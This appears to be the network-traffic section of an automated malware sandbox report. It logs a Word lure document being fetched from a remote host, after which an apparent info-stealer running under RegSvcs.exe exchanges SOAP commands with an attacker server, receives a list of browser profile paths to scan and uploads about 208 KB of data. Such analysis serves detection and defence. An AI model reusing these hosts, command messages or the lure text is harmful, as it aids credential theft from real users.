                                          Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 75 6c 74 3e 74 72 75 65 3c 2f 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 75 6c 74 3e 3c 2f 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 70 6f 6e 73 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                                          Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><CheckConnectResponse xmlns="http://tempuri.org/"><CheckConnectResult>true</CheckConnectResult></CheckConnectResponse></s:Body></s:Envelope>
                                          Jun 24, 2024 18:23:18.937309027 CEST359INHTTP/1.1 200 OK
                                          Content-Length: 212
                                          Content-Type: text/xml; charset=utf-8
                                          Server: Microsoft-HTTPAPI/2.0
                                          Date: Mon, 24 Jun 2024 16:23:17 GMT
                                          Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 75 6c 74 3e 74 72 75 65 3c 2f 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 75 6c 74 3e 3c 2f 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 70 6f 6e 73 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                                          Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><CheckConnectResponse xmlns="http://tempuri.org/"><CheckConnectResult>true</CheckConnectResult></CheckConnectResponse></s:Body></s:Envelope>
                                          Jun 24, 2024 18:23:23.807528973 CEST222OUTPOST / HTTP/1.1
                                          Content-Type: text/xml; charset=utf-8
                                          SOAPAction: "http://tempuri.org/Endpoint/EnvironmentSettings"
                                          Host: 185.38.142.10:7474
                                          Content-Length: 144
                                          Expect: 100-continue
                                          Accept-Encoding: gzip, deflate
                                          Jun 24, 2024 18:23:24.051609993 CEST1236INHTTP/1.1 200 OK
                                          Content-Length: 4744
                                          Content-Type: text/xml; charset=utf-8
                                          Server: Microsoft-HTTPAPI/2.0
                                          Date: Mon, 24 Jun 2024 16:23:23 GMT
                                          Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 45 6e 76 69 72 6f 6e 6d 65 6e 74 53 65 74 74 69 6e 67 73 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 45 6e 76 69 72 6f 6e 6d 65 6e 74 53 65 74 74 69 6e 67 73 52 65 73 75 6c 74 20 78 6d 6c 6e 73 3a 61 3d 22 42 72 6f 77 73 65 72 45 78 74 65 6e 73 69 6f 6e 22 20 78 6d 6c 6e 73 3a 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 3e 3c 61 3a 42 6c 6f 63 6b 65 64 43 6f 75 6e 74 72 79 20 78 6d 6c 6e 73 3a 62 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 32 30 30 33 2f 31 30 2f 53 65 72 69 61 6c 69 7a 61 74 69 6f 6e 2f 41 72 72 61 79 73 22 2f 3e 3c 61 3a 42 6c 6f 63 6b 65 64 49 50 20 78 6d 6c [TRUNCATED]
                                          Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><EnvironmentSettingsResponse xmlns="http://tempuri.org/"><EnvironmentSettingsResult xmlns:a="BrowserExtension" xmlns:i="http://www.w3.org/2001/XMLSchema-instance"><a:BlockedCountry xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"/><a:BlockedIP xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"/><a:Object4>true</a:Object4><a:Object6>false</a:Object6><a:ScanBrowsers>true</a:ScanBrowsers><a:ScanChromeBrowsersPaths xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"><b:string>%USERPROFILE%\AppData\Local\Battle.net</b:string><b:string>%USERPROFILE%\AppData\Local\Chromium\User Data</b:string><b:string>%USERPROFILE%\AppData\Local\Google\Chrome\User Data</b:string><b:string>%USERPROFILE%\AppData\Local\Google(x86)\Chrome\User Data</b:string><b:string>%USERPROFILE%\AppData\Roaming\Opera Software\</b:string><b:string>%USERPROFILE%\AppData\Local\MapleStudio\ChromePlus\User Data</b:string [TRUNCATED]


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          1192.168.2.2249178185.38.142.1074743536C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                          TimestampBytes transferredDirectionData
                                          Jun 24, 2024 18:23:31.727726936 CEST220OUTPOST / HTTP/1.1
                                          Content-Type: text/xml; charset=utf-8
                                          SOAPAction: "http://tempuri.org/Endpoint/SetEnvironment"
                                          Host: 185.38.142.10:7474
                                          Content-Length: 208913
                                          Expect: 100-continue
                                          Accept-Encoding: gzip, deflate
                                          Jun 24, 2024 18:23:32.960233927 CEST294INHTTP/1.1 200 OK
                                          Content-Length: 147
                                          Content-Type: text/xml; charset=utf-8
                                          Server: Microsoft-HTTPAPI/2.0
                                          Date: Mon, 24 Jun 2024 16:23:32 GMT
                                          Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 53 65 74 45 6e 76 69 72 6f 6e 6d 65 6e 74 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 2f 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                                          Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><SetEnvironmentResponse xmlns="http://tempuri.org/"/></s:Body></s:Envelope>
                                          Jun 24, 2024 18:23:33.169193983 CEST294INHTTP/1.1 200 OK
                                          Content-Length: 147
                                          Content-Type: text/xml; charset=utf-8
                                          Server: Microsoft-HTTPAPI/2.0
                                          Date: Mon, 24 Jun 2024 16:23:32 GMT
                                          Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 53 65 74 45 6e 76 69 72 6f 6e 6d 65 6e 74 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 2f 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                                          Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><SetEnvironmentResponse xmlns="http://tempuri.org/"/></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          2192.168.2.2249179185.38.142.1074743536C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                          TimestampBytes transferredDirectionData
                                          Jun 24, 2024 18:23:32.966852903 CEST240OUTPOST / HTTP/1.1
                                          Content-Type: text/xml; charset=utf-8
                                          SOAPAction: "http://tempuri.org/Endpoint/GetUpdates"
                                          Host: 185.38.142.10:7474
                                          Content-Length: 208905
                                          Expect: 100-continue
                                          Accept-Encoding: gzip, deflate
                                          Connection: Keep-Alive
                                          Jun 24, 2024 18:23:35.614211082 CEST408INHTTP/1.1 200 OK
                                          Content-Length: 261
                                          Content-Type: text/xml; charset=utf-8
                                          Server: Microsoft-HTTPAPI/2.0
                                          Date: Mon, 24 Jun 2024 16:23:35 GMT
                                          Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 47 65 74 55 70 64 61 74 65 73 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 47 65 74 55 70 64 61 74 65 73 52 65 73 75 6c 74 20 78 6d 6c 6e 73 3a 61 3d 22 42 72 6f 77 73 65 72 45 78 74 65 6e 73 69 6f 6e 22 20 78 6d 6c 6e 73 3a 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 2f 3e 3c 2f 47 65 74 55 70 64 61 74 65 73 52 65 73 70 6f 6e 73 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                                          Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><GetUpdatesResponse xmlns="http://tempuri.org/"><GetUpdatesResult xmlns:a="BrowserExtension" xmlns:i="http://www.w3.org/2001/XMLSchema-instance"/></GetUpdatesResponse></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          0192.168.2.2249166104.21.74.1914432780C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                          TimestampBytes transferredDirectionData
                                          2024-06-24 16:22:55 UTC141OUTOPTIONS / HTTP/1.1
                                          User-Agent: Microsoft Office Protocol Discovery
                                          Host: universalmovies.top
                                          Content-Length: 0
                                          Connection: Keep-Alive
                                          2024-06-24 16:22:56 UTC717INHTTP/1.1 200 OK
                                          Date: Mon, 24 Jun 2024 16:22:56 GMT
                                          Content-Type: text/html; charset=utf-8
                                          Transfer-Encoding: chunked
                                          Connection: close
                                          Allow: OPTIONS,HEAD,GET,POST,TRACE
                                          CF-Cache-Status: DYNAMIC
                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Xi9%2BHRMNiLinQTbW3FXLSczwaji%2F2lRc6SQ%2BTk9HxuYlRex4B%2BLZeFZkiW5jf0%2BI1BnEMrlLvIMB0EuEjgja7mTJLCdJZRXRypSrMx%2BOPTBNN40xQY9lUmXUYbkV8zoR73HkXHL9"}],"group":"cf-nel","max_age":604800}
                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                          Strict-Transport-Security: max-age=0; includeSubDomains; preload
                                          X-Content-Type-Options: nosniff
                                          Server: cloudflare
                                          CF-RAY: 898e0f368e2f4201-EWR
                                          alt-svc: h3=":443"; ma=86400
                                          2024-06-24 16:22:56 UTC5INData Raw: 30 0d 0a 0d 0a
                                          Data Ascii: 0


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          1192.168.2.2249167172.67.162.954432780C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                          TimestampBytes transferredDirectionData
                                          2024-06-24 16:22:59 UTC133OUTHEAD /notorious.doc HTTP/1.1
                                          Connection: Keep-Alive
                                          User-Agent: Microsoft Office Existence Discovery
                                          Host: universalmovies.top
                                          2024-06-24 16:23:00 UTC840INHTTP/1.1 200 OK
                                          Date: Mon, 24 Jun 2024 16:23:00 GMT
                                          Content-Type: application/msword
                                          Content-Length: 618938
                                          Connection: close
                                          Last-Modified: Mon, 24 Jun 2024 08:04:45 GMT
                                          ETag: "6679289d-971ba"
                                          Expires: Thu, 31 Dec 2037 23:55:55 GMT
                                          Cache-Control: max-age=315360000
                                          CF-Cache-Status: HIT
                                          Age: 4715
                                          Accept-Ranges: bytes
                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SzYRMN1OzTgvdRlQoyRPNIcNem2efeMPQF%2F4Z404pHQo%2BVAlb6yPUhdfTANnX6qLMbJFy5dYycEWIipMWc7%2FGsllq8tBei2PLYsaCWvqgtovKycYCZVol%2FIdJbEHQfiJzSIvhMuM"}],"group":"cf-nel","max_age":604800}
                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                          Strict-Transport-Security: max-age=0; includeSubDomains; preload
                                          X-Content-Type-Options: nosniff
                                          Server: cloudflare
                                          CF-RAY: 898e0f50e900c338-EWR
                                          alt-svc: h3=":443"; ma=86400


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2192.168.2.2249168172.67.162.95443
                                          TimestampBytes transferredDirectionData
                                          2024-06-24 16:23:06 UTC136OUTOPTIONS / HTTP/1.1
                                          Connection: Keep-Alive
                                          User-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601
                                          translate: f
                                          Host: universalmovies.top
                                          2024-06-24 16:23:06 UTC713INHTTP/1.1 200 OK
                                          Date: Mon, 24 Jun 2024 16:23:06 GMT
                                          Content-Type: text/html; charset=utf-8
                                          Transfer-Encoding: chunked
                                          Connection: close
                                          Allow: OPTIONS,HEAD,GET,POST,TRACE
                                          CF-Cache-Status: DYNAMIC
                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UHvy3%2BZCbebjRKvQkrRtp3ug%2BzQBaEwmRhFHC6HWbuk6c3IH0fGP96u7DlF%2BgGT1ppvnI%2FhEmztVPJkW1PoBht9WZkO37RZzxA2YAfXKxF9q5BAGDJrw4r8oPpGHyc32b1GV7wuQ"}],"group":"cf-nel","max_age":604800}
                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                          Strict-Transport-Security: max-age=0; includeSubDomains; preload
                                          X-Content-Type-Options: nosniff
                                          Server: cloudflare
                                          CF-RAY: 898e0f7ada557cff-EWR
                                          alt-svc: h3=":443"; ma=86400
                                          2024-06-24 16:23:06 UTC5INData Raw: 30 0d 0a 0d 0a
                                          Data Ascii: 0


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          3192.168.2.2249169172.67.162.95443
                                          TimestampBytes transferredDirectionData
                                          2024-06-24 16:23:07 UTC166OUTData Raw: 50 52 4f 50 46 49 4e 44 20 2f 20 48 54 54 50 2f 31 2e 31 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 55 73 65 72 2d 41 67 65 6e 74 3a 20 4d 69 63 72 6f 73 6f 66 74 2d 57 65 62 44 41 56 2d 4d 69 6e 69 52 65 64 69 72 2f 36 2e 31 2e 37 36 30 31 0d 0a 44 65 70 74 68 3a 20 30 0d 0a 74 72 61 6e 73 6c 61 74 65 3a 20 66 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 30 0d 0a 48 6f 73 74 3a 20 75 6e 69 76 65 72 73 61 6c 6d 6f 76 69 65 73 2e 74 6f 70 0d 0a 0d 0a
                                          Data Ascii: PROPFIND / HTTP/1.1Connection: Keep-AliveUser-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601Depth: 0translate: fContent-Length: 0Host: universalmovies.top
                                          2024-06-24 16:23:08 UTC728INHTTP/1.1 405 Method Not Allowed
                                          Date: Mon, 24 Jun 2024 16:23:08 GMT
                                          Content-Type: text/html; charset=iso-8859-1
                                          Transfer-Encoding: chunked
                                          Connection: close
                                          Allow: OPTIONS,HEAD,GET,POST,TRACE
                                          CF-Cache-Status: DYNAMIC
                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vnrYoHSbAYpyoUbdT0ziKBYbaVrlco4TKEOjxWuoAo94NK0mZZHYnd0ElgMAaV2epS948vGua6wnP8FWKahKYNk8v5OIhZE%2Bvl12icEHbXLNJDiS1ECB06rL8lOGJAtbXTI5R7v9"}],"group":"cf-nel","max_age":604800}
                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                          Strict-Transport-Security: max-age=0; includeSubDomains; preload
                                          X-Content-Type-Options: nosniff
                                          Server: cloudflare
                                          CF-RAY: 898e0f822f610f9b-EWR
                                          alt-svc: h3=":443"; ma=86400
                                          2024-06-24 16:23:08 UTC231INData Raw: 65 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 35 20 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 6d 65 74 68 6f 64 20 50 52 4f 50 46 49 4e 44 20 69 73 20 6e 6f 74 20 61 6c 6c 6f 77 65 64 20 66 6f 72 20 74 68 69 73 20 55 52 4c 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a
                                          Data Ascii: e1<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>405 Method Not Allowed</title></head><body><h1>Method Not Allowed</h1><p>The requested method PROPFIND is not allowed for this URL.</p></body></html>
                                          2024-06-24 16:23:08 UTC5INData Raw: 30 0d 0a 0d 0a
                                          Data Ascii: 0


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4192.168.2.2249170104.21.74.191443
                                          TimestampBytes transferredDirectionData
                                          2024-06-24 16:23:09 UTC166OUTData Raw: 50 52 4f 50 46 49 4e 44 20 2f 20 48 54 54 50 2f 31 2e 31 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 55 73 65 72 2d 41 67 65 6e 74 3a 20 4d 69 63 72 6f 73 6f 66 74 2d 57 65 62 44 41 56 2d 4d 69 6e 69 52 65 64 69 72 2f 36 2e 31 2e 37 36 30 31 0d 0a 44 65 70 74 68 3a 20 30 0d 0a 74 72 61 6e 73 6c 61 74 65 3a 20 66 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 30 0d 0a 48 6f 73 74 3a 20 75 6e 69 76 65 72 73 61 6c 6d 6f 76 69 65 73 2e 74 6f 70 0d 0a 0d 0a
                                          Data Ascii: PROPFIND / HTTP/1.1Connection: Keep-AliveUser-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601Depth: 0translate: fContent-Length: 0Host: universalmovies.top
                                          2024-06-24 16:23:09 UTC740INHTTP/1.1 405 Method Not Allowed
                                          Date: Mon, 24 Jun 2024 16:23:09 GMT
                                          Content-Type: text/html; charset=iso-8859-1
                                          Transfer-Encoding: chunked
                                          Connection: close
                                          Allow: OPTIONS,HEAD,GET,POST,TRACE
                                          CF-Cache-Status: DYNAMIC
                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pk3ULyNMDA8O3kXvg7Qj7aVkcOGLnKnyxGsLTMABeNAGM%2FDcT6%2B20foYmc4%2ByDI3F7dCyzT0pIiQ2vLxqpNxY4NdH7TQiLdINW2vWw%2FPEMODygm%2Bj2Y8nk3Kyiv1vwi%2F3CjSh%2F5m"}],"group":"cf-nel","max_age":604800}
                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                          Strict-Transport-Security: max-age=0; includeSubDomains; preload
                                          X-Content-Type-Options: nosniff
                                          Server: cloudflare
                                          CF-RAY: 898e0f8baabf4303-EWR
                                          alt-svc: h3=":443"; ma=86400
                                          2024-06-24 16:23:09 UTC231INData Raw: 65 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 35 20 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 6d 65 74 68 6f 64 20 50 52 4f 50 46 49 4e 44 20 69 73 20 6e 6f 74 20 61 6c 6c 6f 77 65 64 20 66 6f 72 20 74 68 69 73 20 55 52 4c 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a
                                          Data Ascii: e1<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>405 Method Not Allowed</title></head><body><h1>Method Not Allowed</h1><p>The requested method PROPFIND is not allowed for this URL.</p></body></html>
                                          2024-06-24 16:23:09 UTC5INData Raw: 30 0d 0a 0d 0a
                                          Data Ascii: 0


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          5192.168.2.2249171104.21.74.1914432780C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                          TimestampBytes transferredDirectionData
                                          2024-06-24 16:23:10 UTC363OUTGET /notorious.doc HTTP/1.1
                                          Accept: */*
                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)
                                          UA-CPU: AMD64
                                          Accept-Encoding: gzip, deflate
                                          Host: universalmovies.top
                                          Connection: Keep-Alive
                                          2024-06-24 16:23:10 UTC844INHTTP/1.1 200 OK
                                          Date: Mon, 24 Jun 2024 16:23:10 GMT
                                          Content-Type: application/msword
                                          Content-Length: 618938
                                          Connection: close
                                          Last-Modified: Mon, 24 Jun 2024 08:04:45 GMT
                                          ETag: "6679289d-971ba"
                                          Expires: Thu, 31 Dec 2037 23:55:55 GMT
                                          Cache-Control: max-age=315360000
                                          CF-Cache-Status: HIT
                                          Age: 4726
                                          Accept-Ranges: bytes
                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6jj%2Bx7R3XgrtAZFyRH%2BXG9qlY7q0fwxGgFUeJ4XD43WEUuWmVbCvQ9YutXL%2FDGwa5ssi2u53BsOmudrXc%2FyBebhQFSXnadnAZ5E6RDtMjT94r2ySVfruR%2Fyqi%2FXZInw6snriMOyJ"}],"group":"cf-nel","max_age":604800}
                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                          Strict-Transport-Security: max-age=0; includeSubDomains; preload
                                          X-Content-Type-Options: nosniff
                                          Server: cloudflare
                                          CF-RAY: 898e0f913a884328-EWR
                                          alt-svc: h3=":443"; ma=86400
                                          2024-06-24 16:23:10 UTC525INData Raw: 7b 5c 72 74 66 31 0d 0d 7b 5c 2a 5c 57 61 75 77 57 62 33 33 6b 56 74 42 65 46 58 6f 46 35 4d 65 38 62 62 6b 61 43 43 38 38 64 71 58 42 31 4c 4e 30 73 38 34 73 61 44 58 66 79 37 77 4e 45 49 6b 46 36 66 77 6f 39 57 62 54 58 55 61 38 70 75 64 44 39 54 5a 6d 62 78 71 32 73 4d 4a 30 39 42 42 59 45 34 4f 55 77 62 32 36 6d 4d 41 6e 6e 49 6c 36 69 45 36 72 4d 6e 41 65 47 50 53 58 62 68 30 79 48 78 64 33 4b 36 55 77 64 65 6d 59 67 7d 0d 0d 7b 5c 37 34 34 33 34 35 39 35 38 70 6c 65 61 73 65 20 63 6c 69 63 6b 20 45 6e 61 62 6c 65 20 65 64 69 74 69 6e 67 20 66 72 6f 6d 20 74 68 65 20 79 65 6c 6c 6f 77 20 62 61 72 20 61 62 6f 76 65 2e 54 68 65 20 69 6e 64 65 70 65 6e 64 65 6e 74 20 61 75 64 69 74 6f 72 73 92 20 6f 70 69 6e 69 6f 6e 20 73 61 79 73 20 74 68 65 20 66 69
                                          Data Ascii: {\rtf1{\*\WauwWb33kVtBeFXoF5Me8bbkaCC88dqXB1LN0s84saDXfy7wNEIkF6fwo9WbTXUa8pudD9TZmbxq2sMJ09BBYE4OUwb26mMAnnIl6iE6rMnAeGPSXbh0yHxd3K6UwdemYg}{\744345958please click Enable editing from the yellow bar above.The independent auditors opinion says the fi
                                          2024-06-24 16:23:10 UTC1369INData Raw: 6e 74 65 72 6e 61 6c 20 63 6f 6e 74 72 6f 6c 73 20 74 6f 20 74 68 65 20 65 78 74 65 6e 74 20 6e 65 63 65 73 73 61 72 79 20 74 6f 20 70 6c 61 6e 20 74 68 65 20 61 75 64 69 74 2e 20 41 75 64 69 74 6f 72 73 20 75 73 65 20 74 68 69 73 20 75 6e 64 65 72 73 74 61 6e 64 69 6e 67 20 6f 66 20 69 6e 74 65 72 6e 61 6c 20 63 6f 6e 74 72 6f 6c 73 20 74 6f 20 61 73 73 65 73 73 20 74 68 65 20 72 69 73 6b 20 6f 66 20 6d 61 74 65 72 69 61 6c 20 6d 69 73 73 74 61 74 65 6d 65 6e 74 20 6f 66 20 74 68 65 20 66 69 6e 61 6e 63 69 61 6c 20 73 74 61 74 65 6d 65 6e 74 73 20 61 6e 64 20 74 6f 20 64 65 73 69 67 6e 20 61 70 70 72 6f 70 72 69 61 74 65 20 61 75 64 69 74 20 70 72 6f 63 65 64 75 72 65 73 20 74 6f 20 6d 69 6e 69 6d 69 7a 65 20 74 68 61 74 20 72 69 73 6b 2e 54 68 65 20 64
                                          Data Ascii: nternal controls to the extent necessary to plan the audit. Auditors use this understanding of internal controls to assess the risk of material misstatement of the financial statements and to design appropriate audit procedures to minimize that risk.The d
                                          2024-06-24 16:23:10 UTC1369INData Raw: 78 61 6d 70 6c 65 20 6f 66 20 61 20 64 65 66 69 63 69 65 6e 63 79 20 69 6e 20 69 6e 74 65 72 6e 61 6c 20 63 6f 6e 74 72 6f 6c 20 74 68 61 74 92 73 20 73 65 76 65 72 65 20 65 6e 6f 75 67 68 20 74 6f 20 62 65 20 63 6f 6e 73 69 64 65 72 65 64 20 61 20 6d 61 74 65 72 69 61 6c 20 77 65 61 6b 6e 65 73 73 20 6f 72 20 73 69 67 6e 69 66 69 63 61 6e 74 20 64 65 66 69 63 69 65 6e 63 79 20 69 73 20 77 68 65 6e 20 61 6e 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 20 6c 61 63 6b 73 20 74 68 65 20 6b 6e 6f 77 6c 65 64 67 65 20 61 6e 64 20 74 72 61 69 6e 69 6e 67 20 74 6f 20 70 72 65 70 61 72 65 20 69 74 73 20 6f 77 6e 20 66 69 6e 61 6e 63 69 61 6c 20 73 74 61 74 65 6d 65 6e 74 73 2c 20 69 6e 63 6c 75 64 69 6e 67 20 66 6f 6f 74 6e 6f 74 65 20 64 69 73 63 6c 6f 73 75 72 65 73
                                          Data Ascii: xample of a deficiency in internal control thats severe enough to be considered a material weakness or significant deficiency is when an organization lacks the knowledge and training to prepare its own financial statements, including footnote disclosures
